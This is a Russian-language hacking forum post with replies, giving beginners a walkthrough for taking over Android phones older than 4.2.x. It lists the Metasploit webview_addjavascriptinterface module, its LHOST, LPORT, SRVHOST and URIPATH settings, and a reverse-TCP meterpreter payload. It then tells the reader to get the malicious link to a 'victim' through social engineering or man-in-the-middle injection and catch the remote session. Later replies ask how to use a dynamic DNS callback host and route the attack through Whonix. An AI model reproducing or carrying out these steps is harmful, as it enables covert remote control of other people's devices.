Toggle sidebar

Статья Android WebView Exploit или взлом андроида по ссылке

Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)

5.png


Если устройства с андроидом выше версии то смотрите эту статью

И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.

И так все что нам понадобиться:

1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код: 
use exploit/android/browser/webview_addjavascriptinterface
1.jpg


3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
3.jpg


4) Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...

4.png


5)Ловим метерпретер сессию

6.jpg


 
  • Нравится
Реакции: Anomalya, mz111, konstata3 и ещё 6
Нажмите, чтобы раскрыть...
Прошу прощения, если ошибаюсь, но тема, которую вы дали, тоже для старых версий андройда.
 
kinevkt сказал(а):
Прошу прощения, если ошибаюсь, но тема, которую вы дали, тоже для старых версий андройда.
Нажмите, чтобы раскрыть...
Поддерживаю. DarkNode : Как быть с android 5.0/5.1/6/0 ?
[doublepost=1489347544,1489330382][/doublepost]DarkNode: Вопрос от новичка. Возможно ли заменить конечную нагрузку (цифры которые получаются, ваш пример 192.168.137.152: 4444 ) на название (например от no-ip) ? Например " newslife.ddns.net :8080 "
[doublepost=1489352321][/doublepost]DarkNode: Что делать если отсутствует AutoLoadAndroid true
и пользуешься whonix gateway ( прописывать айпишник в rsvhost, lhost который я сам назначил 10.152.152.68 ) ?
 

Вложения

  • 1.PNG
    1.PNG
    78,7 КБ · Просмотры: 328
  • 2.PNG
    2.PNG
    46,2 КБ · Просмотры: 298
Последнее редактирование:
Как настроить eth 1 интернет подключения (чтобы появился ip адрес кроме eth0 10.0.2.15) ?
 
а где и как искать новые браузер эксплойты под андроид
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

DeathDay
  • Статья Статья
Статья Проделки Майкрософт: развенчание абсолютной безопасности от Билла Гейтса, часть вторая - Android vs IOS
Ответы
1
Просмотры
4 тыс.
Мои статьи
YagamiLight
YagamiLight
<~DarkNode~>
  • Статья Статья
Статья Evil-Droid [Обход AV APK]
Ответы
60
Просмотры
28 тыс.
Мои статьи
Antisocial
A
<~DarkNode~>
  • Статья Статья
Статья Termux: Мобильный инструмент для анализа и тестирования безопасности
Ответы
52
Просмотры
317 тыс.
Мои статьи
Mitai_dart
Mitai_dart
Sunnych
Каталог Этичный Хакинг (тестирование на проникновение): каталог статей
Ответы
32
Просмотры
104 тыс.
Этичный хакинг и тестирование на проникновение
Gustavo Fring
Gustavo Fring
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab

Верх Низ
Назад